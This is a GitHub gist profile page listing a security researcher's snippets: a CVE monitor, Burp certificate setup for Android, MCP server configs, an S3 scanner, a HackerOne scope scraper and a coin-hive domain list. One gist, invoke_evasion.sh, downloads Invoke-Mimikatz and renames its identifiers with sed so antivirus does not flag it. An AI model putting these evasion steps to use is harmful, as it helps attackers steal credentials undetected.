Skip to content

Instantly share code, notes, and snippets.

View PaulSec's full-sized avatar

Paul PaulSec

View GitHub Profile
@PaulSec
PaulSec / monitor_cve.py
Created February 26, 2018 09:50
Monitors @cvenew and sends me a message on Telegram if a keyword triggers
from tweepy import StreamListener
from tweepy import Stream
import tweepy
import json
import telebot
import requests
CONSUMER_KEY = 'XXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_KEY = 'XXXXXXXXXXXXXXXXXXXXXXX'
@PaulSec
PaulSec / Burp certificate on Android
Created February 16, 2015 19:40
Add your Burp certificate on an Android device
To do so:
1. Export your Burp Certificate
Proxy > Options > CA Certificate > Export in DER format
2. Convert it to PEM
openssl x509 -inform der -in cacert.der -out burp.pem
3. Download it on the device
@PaulSec
PaulSec / n8n_gitlab_discussions.json
Created May 26, 2025 09:17
Here is a configuration file in order to use AzureOpenAI to act as a Tech Lead and make code recommendations in Gitlab
{
"name": "Workflow Copy",
"nodes": [
{
"parameters": {
"owner": "REDACTED_OWNER",
"repository": "REDACTED_REPOSITORY",
"events": [
"merge_requests"
]
@PaulSec
PaulSec / mcp.json
Created April 27, 2025 15:31
mcp.json from my VSCode set-up
{
"servers": {
"my-mcp-server-57788458": {
"type": "stdio",
"command": "uv",
"args": [
"run",
"--with",
"fastmcp",
"--with",
@PaulSec
PaulSec / server.py
Created April 19, 2025 11:35
Simple MCP Server to request data from CFPTime.org
# server.py
from mcp.server.fastmcp import FastMCP
import requests
import json
# Create an MCP server
mcp = FastMCP("Demo")
# Simplify and improve error handling for retrieving CFPs
@mcp.tool()
@PaulSec
PaulSec / index.haml
Created October 26, 2019 19:33
Kung Fury - Hackerman's screen
.page
.confirm
.inner
You're about to hack time, are you Sure?
%input{:type => 'radio', :name => 'hack', :id => 'warp', :value => 'yes'}
%label{:for => 'warp'}
%span Yes
%input{:type => 'radio', :name => 'hack', :id => 'nope', :value => 'no'}
%label{:for => 'nope'}
%span No
@PaulSec
PaulSec / invoke_evasion.sh
Created August 1, 2017 13:50
Small script to bypass AV that triggers Invoke-Mimikatz with shitty rules
# AV Bypass to run Mimikatz
# From: https://www.blackhillsinfosec.com/?p=5555
# Server side:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1
@PaulSec
PaulSec / retrieve_scope.py
Created October 19, 2017 11:41
Retrieve scope from HackerOne (using their directory) + all public reports (commented part)
import requests
import csv
import json
hackerone_url = "https://hackerone.com"
page = 1
session = requests.Session()
# titles = []
reports = []
@PaulSec
PaulSec / aws_scan.py
Created May 10, 2017 08:05
Quick script to scan for AWS (S3 Buckets) and retrieves bunch of info out of it
import subprocess
import argparse
import re
import sys
import requests
def do_dig(domain):
command = "dig {} | grep IN".format(domain)
try:
output = subprocess.check_output(command, shell=True, stdin=subprocess.PIPE, stderr=subprocess.STDOUT)
@PaulSec
PaulSec / coin-hive_domains.txt
Last active April 20, 2022 07:32
Domain with coin-hive integration (only from top 1M Alexa)
0x00sec.org
100-bal.ru
123kubo.info
123moviesfull.co
123movies.re
1337x.io
141jav.com
14byte.net
1568783.com
1587865.com